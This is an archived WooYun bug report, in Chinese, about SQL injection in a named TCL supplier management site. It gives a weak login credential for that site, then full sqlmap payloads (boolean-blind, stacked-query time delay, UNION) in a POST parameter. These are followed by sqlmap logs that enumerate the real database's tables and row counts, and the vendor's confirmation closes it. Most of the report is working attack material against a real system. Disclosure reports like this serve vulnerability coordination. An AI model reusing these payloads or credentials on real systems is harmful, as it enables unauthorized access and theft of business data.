乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-15: 细节已通知厂商并且等待厂商处理中 2015-12-15: 厂商已经确认,细节仅向厂商公开 2015-12-25: 细节向核心白帽子及相关领域专家公开 2016-01-04: 细节向普通白帽子公开 2016-01-14: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
RT
系统:http://vmi.tclking.com/弱口令:100055 123456登陆后发现一个查询处注入
漏洞地址:
---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTE3MjA4MTEwNA9kFgICAw9kFgYCAQ9kFgICAQ8PFgIeBFRleHQFOlRDTOeOi+eJjOS+m+W6lOWVhuWNj+WQjOW5s+WPsD4+5Y+R56Wo566h55CGPj7lj5Hnpajmn6Xor6JkZAIXDw8WAh4HVmlzaWJsZWhkZAIZDw8WAh8BZ2QWAgIDDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudAIBZBYCZg9kFgQCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVmY3VycmVudGNvbG9yPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjZWJlZmZmJyx0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7Hgpvbm1vdXNlb3V0BUF0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IsdGhpcy5zdHlsZS5mb250V2VpZ2h0PScnOxYeZg8PFgIfAAUBMWRkAgEPDxYCHwAFBDA3MDJkZAICDw8WAh8ABQNDTllkZAIDDw8WAh8ABQYyMDEyMDRkZAIEDw8WAh8ABQgwNTk1NjQ1MmRkAgUPDxYCHwAFCTE4NDA5NC4yMGRkAgYPDxYCHwAFCDMxMjk2LjA1ZGQCBw8PFgIfAAUEMTcxMGRkAggPDxYCHwAFATlkZAIJDw8WAh8ABQYmbmJzcDtkZAIKDw8WAh8ABQYmbmJzcDtkZAILDw8WAh8ABQYmbmJzcDtkZAIMDw8WAh8ABQgyMDEzMDYwNmRkAg0PDxYCHwAFBjA5MjgyMWRkAg4PZBYCZg8VAQBkAgIPZBYGZg8PFgIfAAUG5ZCI6K6hZGQCBQ8PFgIfAAUIMTg0MDk0LjJkZAIGDw8WAh8ABQgzMTI5Ni4wNWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQ5jaGtVbkNvbmZpcm1lZAUMY2hrQ29uZmlybWVkBQdnZHZJbmZvDzwrAAoBCAIBZMuc2LOHGHL8IahQQ0XyZ//r008p&__VIEWSTATEGENERATOR=5E109024&__EVENTVALIDATION=/wEWCALp2dChAgLD2vjTBwLWoOLpAgKF+878DALD5bnqCgLDlPiHCwLPlry/BQLTgfvCCkTih6mBYrW8Yvj4JFd+zc2kHXR+&txtBukrs=0702' AND 2611=2611 AND 'tcFj'='tcFj&txtWerks=&txtMon=&chkUnConfirmed=on&chkConfirmed=on&BtnQuery= %E6%8F%90 %E4%BA%A4 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTE3MjA4MTEwNA9kFgICAw9kFgYCAQ9kFgICAQ8PFgIeBFRleHQFOlRDTOeOi+eJjOS+m+W6lOWVhuWNj+WQjOW5s+WPsD4+5Y+R56Wo566h55CGPj7lj5Hnpajmn6Xor6JkZAIXDw8WAh4HVmlzaWJsZWhkZAIZDw8WAh8BZ2QWAgIDDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudAIBZBYCZg9kFgQCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVmY3VycmVudGNvbG9yPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjZWJlZmZmJyx0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7Hgpvbm1vdXNlb3V0BUF0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IsdGhpcy5zdHlsZS5mb250V2VpZ2h0PScnOxYeZg8PFgIfAAUBMWRkAgEPDxYCHwAFBDA3MDJkZAICDw8WAh8ABQNDTllkZAIDDw8WAh8ABQYyMDEyMDRkZAIEDw8WAh8ABQgwNTk1NjQ1MmRkAgUPDxYCHwAFCTE4NDA5NC4yMGRkAgYPDxYCHwAFCDMxMjk2LjA1ZGQCBw8PFgIfAAUEMTcxMGRkAggPDxYCHwAFATlkZAIJDw8WAh8ABQYmbmJzcDtkZAIKDw8WAh8ABQYmbmJzcDtkZAILDw8WAh8ABQYmbmJzcDtkZAIMDw8WAh8ABQgyMDEzMDYwNmRkAg0PDxYCHwAFBjA5MjgyMWRkAg4PZBYCZg8VAQBkAgIPZBYGZg8PFgIfAAUG5ZCI6K6hZGQCBQ8PFgIfAAUIMTg0MDk0LjJkZAIGDw8WAh8ABQgzMTI5Ni4wNWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQ5jaGtVbkNvbmZpcm1lZAUMY2hrQ29uZmlybWVkBQdnZHZJbmZvDzwrAAoBCAIBZMuc2LOHGHL8IahQQ0XyZ//r008p&__VIEWSTATEGENERATOR=5E109024&__EVENTVALIDATION=/wEWCALp2dChAgLD2vjTBwLWoOLpAgKF+878DALD5bnqCgLDlPiHCwLPlry/BQLTgfvCCkTih6mBYrW8Yvj4JFd+zc2kHXR+&txtBukrs=0702';WAITFOR DELAY '0:0:5'--&txtWerks=&txtMon=&chkUnConfirmed=on&chkConfirmed=on&BtnQuery= %E6%8F%90 %E4%BA%A4 Type: UNION query Title: Generic UNION query (NULL) - 19 columns Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTE3MjA4MTEwNA9kFgICAw9kFgYCAQ9kFgICAQ8PFgIeBFRleHQFOlRDTOeOi+eJjOS+m+W6lOWVhuWNj+WQjOW5s+WPsD4+5Y+R56Wo566h55CGPj7lj5Hnpajmn6Xor6JkZAIXDw8WAh4HVmlzaWJsZWhkZAIZDw8WAh8BZ2QWAgIDDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudAIBZBYCZg9kFgQCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVmY3VycmVudGNvbG9yPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjZWJlZmZmJyx0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7Hgpvbm1vdXNlb3V0BUF0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IsdGhpcy5zdHlsZS5mb250V2VpZ2h0PScnOxYeZg8PFgIfAAUBMWRkAgEPDxYCHwAFBDA3MDJkZAICDw8WAh8ABQNDTllkZAIDDw8WAh8ABQYyMDEyMDRkZAIEDw8WAh8ABQgwNTk1NjQ1MmRkAgUPDxYCHwAFCTE4NDA5NC4yMGRkAgYPDxYCHwAFCDMxMjk2LjA1ZGQCBw8PFgIfAAUEMTcxMGRkAggPDxYCHwAFATlkZAIJDw8WAh8ABQYmbmJzcDtkZAIKDw8WAh8ABQYmbmJzcDtkZAILDw8WAh8ABQYmbmJzcDtkZAIMDw8WAh8ABQgyMDEzMDYwNmRkAg0PDxYCHwAFBjA5MjgyMWRkAg4PZBYCZg8VAQBkAgIPZBYGZg8PFgIfAAUG5ZCI6K6hZGQCBQ8PFgIfAAUIMTg0MDk0LjJkZAIGDw8WAh8ABQgzMTI5Ni4wNWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQ5jaGtVbkNvbmZpcm1lZAUMY2hrQ29uZmlybWVkBQdnZHZJbmZvDzwrAAoBCAIBZMuc2LOHGHL8IahQQ0XyZ//r008p&__VIEWSTATEGENERATOR=5E109024&__EVENTVALIDATION=/wEWCALp2dChAgLD2vjTBwLWoOLpAgKF+878DALD5bnqCgLDlPiHCwLPlry/BQLTgfvCCkTih6mBYrW8Yvj4JFd+zc2kHXR+&txtBukrs=0702' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113) CHAR(122) CHAR(118) CHAR(120) CHAR(113) CHAR(75) CHAR(67) CHAR(97) CHAR(86) CHAR(73) CHAR(107) CHAR(116) CHAR(120) CHAR(67) CHAR(75) CHAR(89) CHAR(104) CHAR(84) CHAR(103) CHAR(82) CHAR(73) CHAR(107) CHAR(118) CHAR(116) CHAR(113) CHAR(72) CHAR(119) CHAR(109) CHAR(87) CHAR(86) CHAR(105) CHAR(99) CHAR(67) CHAR(99) CHAR(85) CHAR(120) CHAR(70) CHAR(114) CHAR(74) CHAR(107) CHAR(116) CHAR(89) CHAR(74) CHAR(114) CHAR(98) CHAR(113) CHAR(120) CHAR(112) CHAR(122) CHAR(113),NULL,NULL,NULL,NULL,NULL-- &txtWerks=&txtMon=&chkUnConfirmed=on&chkConfirmed=on&BtnQuery= %E6%8F%90 %E4%BA%A4 ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000
数据库:
大量数据信息,后面网络不稳定跑得太慢,就不再跑了。
[16:24:36] [INFO] fetching tables for databases: DB2, Northwind, master, model,msdb, pubs, tempdb[16:24:36] [INFO] skipping system database 'tempdb'[16:24:36] [INFO] skipping system database 'msdb'[16:24:36] [INFO] skipping system database 'pubs'[16:24:36] [INFO] skipping system database 'master'[16:24:36] [INFO] skipping system database 'model'[16:24:36] [INFO] fetching number of tables for database 'DB2'[16:24:36] [INFO] resumed: 70[16:24:36] [INFO] resumed: dbo.cgt04[16:24:36] [INFO] resumed: dbo.cgt05[16:24:36] [INFO] resumed: dbo.cgt07[16:24:36] [INFO] resumed: dbo.deli_plan[16:24:36] [INFO] resumed: dbo.deli_plan_his[16:24:36] [INFO] resumed: dbo.dtproperties[16:24:36] [INFO] resumed: dbo.kcm02[16:24:36] [INFO] resumed: dbo.kcm02_bak[16:24:36] [INFO] resumed: dbo.kct03[16:24:36] [INFO] resumed: dbo.kct06[16:24:36] [INFO] resumed: dbo.lifnr_list[16:24:36] [INFO] resumed: dbo.panel_supply_info[16:24:37] [INFO] resumed: dbo.panel_supply_info_his[16:24:37] [INFO] resumed: dbo.pay_invoice[16:24:37] [INFO] resumed: dbo.po0019_1[16:24:37] [INFO] resumed: dbo.po0019_2[16:24:37] [INFO] resumed: dbo.sap_stg_info[16:24:37] [INFO] resumed: dbo.scm_commit_status[16:24:37] [INFO] resumed: dbo.scm_fcst_info[16:24:37] [INFO] resumed: dbo.scm_fcst_info_B2[16:24:37] [INFO] resumed: dbo.scm_fcst_info_his[16:24:37] [INFO] resumed: dbo.scm_fcst_po_info[16:24:37] [INFO] resumed: dbo.scm_lgort_list[16:24:37] [INFO] resumed: dbo.scm_lgort_map_list[16:24:37] [INFO] resumed: dbo.scm_onroad_list[16:24:37] [INFO] resumed: dbo.scm_panel_lifnr_list[16:24:37] [INFO] resumed: dbo.scm_panel_lifnr_text[16:24:37] [INFO] resumed: dbo.scm_planner_list[16:24:37] [INFO] resumed: dbo.scm_rbc_list[16:24:37] [INFO] resumed: dbo.scm_rbc_so_list[16:24:37] [INFO] resumed: dbo.scm_reply_flag_list[16:24:37] [INFO] resumed: dbo.scm_stg_info[16:24:37] [INFO] resumed: dbo.scm_stg_status[16:24:37] [INFO] resumed: dbo.scm_time_master[16:24:37] [INFO] resumed: dbo.sqlmapoutput[16:24:37] [INFO] resumed: dbo.streamflowdetail[16:24:37] [INFO] resumed: dbo.streamflowdetail_his[16:24:37] [INFO] resumed: dbo.streamflowheader[16:24:37] [INFO] resumed: dbo.streamflowheader_his[16:24:37] [INFO] resumed: dbo.sysconstraints[16:24:37] [INFO] resumed: dbo.syssegments[16:24:37] [INFO] resumed: dbo.USER_LoginList[16:24:37] [INFO] resumed: dbo.USER_oper_dtl[16:24:37] [INFO] resumed: dbo.USER_oper_hd[16:24:37] [INFO] resumed: dbo.USER_role_dtl[16:24:37] [INFO] resumed: dbo.USER_role_hd[16:24:37] [INFO] resumed: dbo.USERDB[16:24:37] [INFO] resumed: dbo.v_all_scm_fcst_info[16:24:37] [INFO] resumed: dbo.v_all_scm_fcst_info_delivery[16:24:37] [INFO] resumed: dbo.v_all_scm_fcst_info_v2[16:24:37] [INFO] resumed: dbo.v_cgt05[16:24:37] [INFO] resumed: dbo.v_cgt07[16:24:37] [INFO] resumed: dbo.v_open_po_no_list[16:24:37] [INFO] resumed: dbo.v_open_po_sum_list[16:24:37] [INFO] resumed: dbo.v_open_po_sum_list_rbc[16:24:38] [INFO] resumed: dbo.v_panel_supply_info[16:24:38] [INFO] resumed: dbo.v_po0019_2[16:24:38] [INFO] resumed: dbo.v_scm_delivery_info[16:24:38] [INFO] resumed: dbo.v_scm_delivery_list[16:24:38] [INFO] resumed: dbo.v_scm_fcst_info[16:24:38] [INFO] resumed: dbo.v_scm_panel_lifnr_list[16:24:38] [INFO] resumed: dbo.v_VM_Reg_Info_In[16:24:38] [INFO] resumed: dbo.vendor_info[16:24:38] [INFO] resumed: dbo.VM_Location[16:24:38] [INFO] resumed: dbo.VM_LocationType[16:24:38] [INFO] resumed: dbo.VM_reg_info[16:24:38] [INFO] resumed: dbo.VM_reg_truck_list[16:24:38] [INFO] resumed: dbo.XTM03[16:24:38] [INFO] resumed: dbo.XTM03_BUKRS[16:24:38] [INFO] resumed: dbo.ZMMIM0016_TK[16:24:38] [INFO] skipping system database 'Northwind'[16:24:38] [INFO] resumed: 4469[16:24:38] [INFO] resumed: 5337[16:24:38] [INFO] resumed: 69[16:24:38] [INFO] resumed: 58[16:24:38] [INFO] resumed: 181[16:24:38] [INFO] resumed: 16[16:24:38] [INFO] resumed: 83[16:24:38] [INFO] resumed: 18[16:24:38] [INFO] resumed: 241517[16:24:38] [INFO] resumed: 16357[16:24:38] [INFO] resumed: 17[16:24:38] [INFO] resumed: 6[16:24:38] [INFO] resumed: 206955[16:24:38] [INFO] resumed: 4184787[16:24:38] [INFO] resumed: 7719056[16:24:38] [INFO] resumed: 4676347[16:24:38] [INFO] resumed: 3[16:24:38] [INFO] resumed: 0[16:24:38] [INFO] resumed: 2[16:24:38] [INFO] resumed: 383451[16:24:38] [INFO] resumed: 484208[16:24:38] [INFO] resumed: 10989[16:24:38] [INFO] resumed: 12099533[16:24:38] [INFO] resumed: 2[16:24:38] [INFO] resumed: 755[16:24:38] [INFO] resumed: 839455[16:24:38] [INFO] resumed: 119790[16:24:38] [INFO] resumed: 392872[16:24:38] [INFO] resumed: 3512300[16:24:39] [INFO] resumed: 8521[16:24:39] [INFO] resumed: 0[16:24:39] [INFO] resumed: 20427[16:24:39] [INFO] resumed: 25610[16:24:39] [INFO] resumed: 30420229[16:24:39] [INFO] resumed: 0[16:24:39] [INFO] resumed: 88[16:24:39] [INFO] resumed: 4[16:24:39] [INFO] resumed: 43[16:24:39] [INFO] resumed: 103[16:24:39] [INFO] resumed: 12[16:24:39] [INFO] resumed: 70[16:24:39] [INFO] resumed: 18[16:24:39] [INFO] resumed: 8[16:24:39] [INFO] resumed: 13[16:24:39] [INFO] resumed: 952[16:24:39] [INFO] resumed: 0[16:24:39] [INFO] resumed: 284[16:24:39] [INFO] resumed: 0[16:24:39] [INFO] resumed: 2626938[16:24:39] [INFO] resumed: 1659871[16:24:39] [INFO] resumed: 851611[16:24:39] [INFO] resumed: 419488[16:24:39] [INFO] resumed: 91[16:24:39] [INFO] resumed: 3[16:24:39] [INFO] resumed: 4331[16:24:39] [INFO] resumed: 19503[16:24:39] [INFO] resuming partial value: 3228[16:24:39] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[16:24:39] [INFO] retrieved:[16:25:08] [WARNING] reflective value(s) found and filtering out[16:26:03] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)[16:27:20] [INFO] retrieved: 9539[16:30:14] [INFO] retrieved:[16:30:44] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)7719[16:36:49] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)[16:38:04] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)79[16:41:28] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)2[16:43:23] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)[16:44:13] [INFO] retrieved: 4676904[16:45:27] [INFO] retrieved:[16:45:57] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)[16:47:43] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)21
最后不要脸的求个高rank,求赏脸=_=
修改弱口令内部系统自查下注入
危害等级:中
漏洞Rank:8
确认时间:2015-12-15 17:09
感谢您对TCL的关注,谢谢!
暂无
